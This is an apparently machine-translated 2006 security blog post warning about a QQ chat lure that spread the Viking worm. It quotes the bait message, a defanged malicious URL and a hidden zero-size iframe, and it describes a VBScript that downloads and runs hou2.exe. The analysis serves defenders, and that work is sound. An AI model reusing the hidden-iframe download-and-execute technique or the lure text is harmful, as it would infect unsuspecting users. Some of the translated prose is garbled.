The QQ tail that spread the vijin/Viking worm is changed.

EndurerOriginal

2006-09-031Version

Be careful to spread worm. win32.viking. r through the URL (Q-zone. ***** QQ. c0m) in the QQ tail

The URL in the article has changed. When the QQ friends dialog box is opened, the message is:
/----------
I have a female student who participated in the 2006 online style selection for college students. The Q-zone space has a photo of her candidate. I will help him increase his popularity during the tour. Thank you ......

Hxxp: // Q-Zone.QQ ***. c0m. % 37 *** % 76% *** 34% 2e % 63% 6e/Q-zone/cgi_bin/entry-cgiuin = *** 98393212
----------/

The webpage header contains:
/----------
<IFRAME src = hxxp: // web ***** 2.% 33% 39% 63 *** % 6f % 6D % *** 2e % 6f % 72% 67/MS/mm.htm width = 0 Height = 0> </iframe>
----------/

Hxxp: // web ***** 2.% 33% 39% 63 **** % 6f % 6D % *** 2e % 6f % 72% 67/MS/mm.htm has a script for protected by htmlship XP (unregistered Version)Code, ScriptProgramThere are three parts (two parts in the original script program ).

Part 2 script programsJavascript is used to prevent users from choosing webpage content, blocking key menus by right-clicking, and the data required for the second part of the script program to run correctly.

Part 2 script programsVBScript is used. Its function is to use ADODB. Stream, Microsoft. XMLHTTP, and scripting. FileSystemObject to put files in the MS directory of a website (which is not provided here ).Hou2.exe(Originally downloaded hou1.exe) is savedG0ld.comAnd run it using the ShellExecute method of the shell. Application object.

Kaspersky willHou2.exeReportedWorm. win32.viking. r.

The script code is also encrypted in the middle of the page. After the script is decrypted, it is:
/----------
<IFRAME width = "760" Height = "1830" src = "hxxp: // U. *** 7town.com/html/760_1830/ly1/index.html? Uid = 15407 & A = & B = & C = & D = & E = & F = "frameborder =" no "border =" 0 "marginwidth =" 0 "marginheight =" 0 "scrolling =" no "> </iframe>
----------/